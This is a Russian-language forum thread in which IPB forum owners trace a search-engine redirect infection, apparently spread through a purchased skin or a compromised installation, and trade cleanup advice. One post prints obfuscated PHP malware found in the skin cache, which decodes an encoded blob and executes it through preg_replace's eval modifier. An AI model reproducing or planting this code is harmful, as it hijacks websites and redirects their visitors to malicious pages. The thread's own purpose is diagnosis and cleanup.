Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
AlexAuto

Вирус в Skin от Evanescence

Рекомендованные сообщения

решил сделать тему так как хочу уберечь других от покупки скина у Evanescence от IBSkin.xxx

купил у них скин 18 числа и сразу установил, 19 числа посещаемость упала в двое, 23 числа пользователь написал что его антивирус матерится на форум RedirDL-inf [Trj], 25 числа начал сам искать вирус, просиходит редирект на сайт xxxx://url4short.info/692f6991 при переходе с поисковиков на форум. перерыл весь движок, поменял все файлы движка, не чего не дало, в итоге попросил специалистов, несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли. посещаемость упала с 60000 до 10000, не кто не смог помочь в поисках проблемы, в итоге сегодня разобрались что все тянется со скриптов скина, скин удалили кеш почистили и все стало четко,

Поделиться сообщением


Ссылка на сообщение

Это довольно серьезное обвинение, и нужны более весомые доказательства чем "у меня на форуме нашелся вирус". Далеко не факт, что вирус поставлялся вместе с шаблонам. Вы открывали дистрибутив скина, нашли в нем злополучный скрипт? Если версия форума та, что указана в профиле, то у меня для вас "хорошие" новости... Вы в курсе событий про выходы последних патчей безопасности?

 

60К хостов в день?? Это таки немалая посещаемость,

несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли.

Такие редиректы как правило палятся очень лекго, и искать там особо нечего. Выявляется тип редиректа - серверный или жс и, исходя из типа, проводятся поиски начиная с местах где чаще всего его прописывают.

Поделиться сообщением


Ссылка на сообщение

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)

версия IPB последняя, про безопастность вкурсе,

Поделиться сообщением


Ссылка на сообщение

У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

 

Выложите куда-нибудь и скиньте в личку ссылку на дистрибутив скина - и мне будет интересно поискать, и вам будет полезно, если окажется, что проблема все же не в скине.

Поделиться сообщением


Ссылка на сообщение
У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

Это не причина не доверять.

В 2008 (да и в 2009 вроде) при регистрации еще не требовалось вписывать Board URL.

 

А еще раньше версию форума тоже не надо было указывать

Поделиться сообщением


Ссылка на сообщение

да конечно, скрипт подгружаемый по куки с другого сервера

Скрипт где был обнаружен, в дистрибутиве или на рабочем форуме? Если на форуме и при этом не был проверен дистрибутив, тут говорить не о чем. То, что вредоносный скрипт оказался в исходном коде это естественно, это же жс скрипт.

 

Это не причина не доверять.

@Fisana, речь не о доверии, а о некомпетентности автора. ТС конкретно так и не указал, есть ли этот вредоносный код в дистрибутиве шаблона или нет. Поэтому здесь сложно доверять его словам.

Поделиться сообщением


Ссылка на сообщение

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)версия IPB последняя, про безопастность вкурсе,

 

Это вирус Вашего Форума, а не шаблона. Так, как я сталкивался с этим неоднократно.

 

Простой пример

Знакомый пишет.

У меня через гугл на форум попасть не возможно, переадресовывает на другой форум. Шаблон у него стоял, который использовал красоты. (Смена цвета и тд).

Взял, удалил его, и все пропало, все работает. Думаю что-то не то. Полез на фтп, в основном все файлы, включая конфиг были заражены. Прописан код Eval(6.

А причина была простая, не стоит храниться пароли, в фтп менеджерах, и стоит периодически их менять. Но есть вероятность хостинг. Сообщите им.

Вирусы сидят, в файлах с расширение php, но лучше проверить все.

 

Примеры, где я чистил.

conf_global.php

/cache/skin_cache

/cache/lang_cache

/hooks

/ips_kernel

/public/style_images/ (Ваш шаблон). В моем случае, в папке с шаблонов было много php файлов, и все заражены.

 

Можно ssh поиском, чтобы обнаружить в каких файлах используется этот вредоносный код.

Поделиться сообщением


Ссылка на сообщение
01/05/13 12:38 (изменено)

Читать: http://forums.odforce.net/index.php?/topic/16575-rss-feeds-link-problem/

 

У меня данная зараза сидела в кеше шаблона cache/skin_cache/что-то_там_1/skin_global.php (по памяти). В середине файла идет код инклуда JS (легче сделать поиск по переменной $mds )

 

Последний патч устраняет дыру.

 

Я не специалист, но по моему, также перестройка кеша удалит все.

Изменено пользователем mizer

Поделиться сообщением


Ссылка на сообщение

Да, бяда. Такая же проблема. Появилась еще в декабре. Редирект на вышеуказанный сайт. Думал что почистил, но сейчас проверил, редирект снова стал проявляться. Вот вишь засада, и как его вынести полностью? Может кто напишет подробно как с сей напастью бороться, искать зараженные файлы?

Поделиться сообщением


Ссылка на сообщение

Искать шеллы.

Сменить пароли (бд, можно фтп).

Читать соответствующие топики на форуме где эта тема обсуждалась уже не один раз.

Поделиться сообщением


Ссылка на сообщение

Ну эт понятно. Я рассчитывал больше на подробности, ну ладно, кто ищет собсно, тот найдет. В файле /cache/skin_cache/cacheid_Х/skin_global.php нашел лишнее:

$k='bf05f0304ee14efae6ce9165e0a2c194';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[bs/uBvR(wvzgBgP[bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[bZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');

 

Я так понимаю это и есть шелл?

Поделиться сообщением


Ссылка на сообщение

Да, это и есть одна из его разновидностей. Перестройте кеш, чтобы убедится что код находился только в кеше а не в шаблоне, иначе при перестроении он снова появится.

Поделиться сообщением


Ссылка на сообщение

Да, кэш перестроил, код пропал. Пока вродь не редиректит.

Поделиться сообщением


Ссылка на сообщение

Блин, та же беда. Подскажите плс лоху. Этот код надо найти через админку в файлах и стереть целиком или там есть какие заморочки и лохам лучче не соваца?

С уважением

Поделиться сообщением


Ссылка на сообщение

Точно такая же проблема, уже все файлы на все возможные совпадения проверил, всю базу, вообще все что можно. Убираю код из skin_global.php и через некоторое время он снова перезаписывается :(

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...